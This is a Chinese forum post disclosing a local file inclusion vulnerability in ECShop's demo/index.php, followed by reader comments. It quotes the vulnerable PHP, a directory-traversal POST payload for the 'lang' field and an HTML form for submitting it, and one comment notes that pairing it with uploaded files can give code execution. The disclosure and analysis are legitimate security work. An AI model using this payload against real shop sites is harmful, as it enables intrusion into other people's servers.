ECShop网店系统最新版本地包含漏洞

90_

这个洞，其实我在2012年1月的时候看ecshop就分析出来过，当初由于感觉鸡肋就没怎么放出来。刚下了个官网最新版的，没想到还存在。
漏洞文件在：/demo/index.php

1. 
   
2. if (!empty($_POST['lang'])) //如果不为空
   
3. {
   
4. $lang_charset = explode('_', $_POST['lang']); //_分割
   
5. $updater_lang = $lang_charset[0].'_'.$lang_charset[1];
   
6. $ec_charset = $lang_charset[2]; //我们要控制的。
   
7. }
   
8. .
   
9. .
   
10. .
    
11. /* 加载升级程序所使用的语言包 */
    
12. $updater_lang_package_path = ROOT_PATH . 'demo/languages/' . $updater_lang . '_' . $ec_charset .'.php'; //成功进行控制
    
13. if (file_exists($updater_lang_package_path))
    
14. {
    
15. include_once($updater_lang_package_path); //存在就包含。
    
16. $smarty->assign('lang', $_LANG);
    
17. }
    
18. else
    
19. {
    
20. die('Can\'t find language package!');
    
21. }

复制代码

为了方便测试，我在本地网站根目录下建立一个1.php
代码如下：

1. 
   
2. <?php
   
3. Phpinfo();
   
4. ?>

复制代码

然后利用如下：
POST提交

1. lang=123_123_1/../../../1

复制代码

成功包含 根目录下1.php

由于本机，搭建环境出了个问题，这个是借别人的图。。应该为post提交，这个漏洞鸡肋之处在于，魔术引号，后面貌似不能%00。
利用代码。保存为html。

1. 
   
2. <font face="宋体 "><code id="code2"> <html>
   
3. <body>
   
4. <form action="http://127.0.0.1/demo/index.php" method="post"
   
5. enctype="multipart/form-data">
   
6. <input type="text" name="lang" />
   
7. <input type="submit" name="submit" value="Submit" />
   
8. </form>
   
9. </body>
   
10. </html></code></font>

复制代码

作者：风之传说 》》90sec

Diana

分析的精明 学习了

热心网友5

感谢分享，分析得很详细。从代码看确实路径拼接处直接用了用户输入的 `$ec_charset`，配合目录穿越可以包含任意文件。虽然魔术引号和不能 %00 截断限制了利用场景，但 demo 目录放在生产环境本身就挺危险。想知道官方后来有没有补丁修复这个文件？还是说这个 demo 文件夹建议直接删除？

热心网友3

感谢分享！这个洞确实有点历史了，看来官方一直没修复demo目录下的文件包含问题。虽然环境限制了魔术引号和%00截断，但路径穿越配合上传文件仍然有利用价值，尤其当服务器允许上传图片等文件时，结合包含可以达到代码执行。再次感谢你的详细分析和利用演示！

热心网友3

感谢分享！这个漏洞分析得很详细，虽然魔术引号和路径限制让利用有一定条件，但最新版仍存在本地包含风险确实值得重视，尤其是对使用demo目录的站点。建议官方尽快修复对`$ec_charset`的过滤检查。再次感谢你的发现和代码示例。